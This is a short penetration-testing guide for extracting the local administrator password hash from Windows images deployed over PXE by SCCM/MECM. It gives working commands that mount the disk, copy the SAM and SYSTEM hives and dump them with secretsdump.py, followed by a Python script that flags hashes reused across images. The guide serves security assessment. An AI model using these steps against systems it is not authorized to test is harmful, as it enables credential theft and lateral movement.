Use this technique in PXE-Enabled SCCM/MECM Environments
This technique can be used to extract the default local admin password from a default installation delivered over PXE by MECM/SCCM.
Step One - Create the VM
Create a blank VM
Do not provide ISO
Enable BIOS instead of UEFI
Step Two - Boot from PXE
When the VM boots (in VMware), press F12 when prompted to boot from PXE.
Step Three - Proceed with PXE/SCCM Windows installation
Install one of the images for a client Windows 10/11 OS.
Power down the VM upon completion.
Step Four - Mount the VHD/VMDK Virtual Hard Disk File
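# Create the mount point and the output directory (both must exist first)
sudo mkdir -p /mnt/vhd
mkdir -p ~/extracted
# Mount the VHD read-only
sudo guestmount -a /path/to/vm.vhd -m /dev/sda1 /mnt/vhd --ro
# Copy the hives
sudo cp /mnt/vhd/Windows/System32/config/SYSTEM ~/extracted/
sudo cp /mnt/vhd/Windows/System32/config/SAM ~/extracted/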
Step Five - Dump the SAM Database with secretsdump.py
secretsdump.py -sam ~/extracted/SAM -system ~/extracted/SYSTEM LOCAL
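When this procedure is repeated for more than one image during an assessment, the result worth reporting is whether the same local credential is baked into every build. The following is an added example, not part of the original note: it parses secretsdump-style SAM lines and lists non-empty NT hashes that appear in more than one image. The image names, the `localsupport` account and the hash values are constructed samples.

```python
import re
from collections import defaultdict

# NT hash of the empty string: the account has no password set (typical for
# disabled built-ins such as Guest), so it is excluded from the reuse check.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# secretsdump SAM line format: uid:rid:lmhash:nthash:::
SAM_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

def parse_sam_dump(text):
    """Return (user, rid, nt_hash) tuples; banner and status lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = SAM_LINE.match(line.strip())
        if m:
            rows.append((m.group(1), int(m.group(2)), m.group(4).lower()))
    return rows

def shared_local_credentials(dumps):
    """dumps maps image name -> dump text.
    Return [(nt_hash, [(image, user, rid), ...])] for every non-empty hash
    that appears in more than one image."""
    owners = defaultdict(list)
    for image, text in sorted(dumps.items()):
        for user, rid, nt in parse_sam_dump(text):
            if nt != EMPTY_NT:
                owners[nt].append((image, user, rid))
    return sorted((nt, accts) for nt, accts in owners.items()
                  if len({image for image, _, _ in accts}) > 1)

# Constructed sample output: hash values are made up, image names hypothetical.
LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string
SAMPLE_DUMPS = {
    "win10-image": f"""[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:{LM}:00112233445566778899AABBCCDDEEFF:::
Guest:501:{LM}:{EMPTY_NT}:::""",
    "win11-image": f"""Administrator:500:{LM}:00112233445566778899aabbccddeeff:::
Guest:501:{LM}:{EMPTY_NT}:::
localsupport:1001:{LM}:ffeeddccbbaa99887766554433221100:::""",
}

if __name__ == "__main__":
    for nt, accts in shared_local_credentials(SAMPLE_DUMPS):
        where = ", ".join(f"{img}:{user} (RID {rid})" for img, user, rid in accts)
        print(f"{nt} reused by {where}")
```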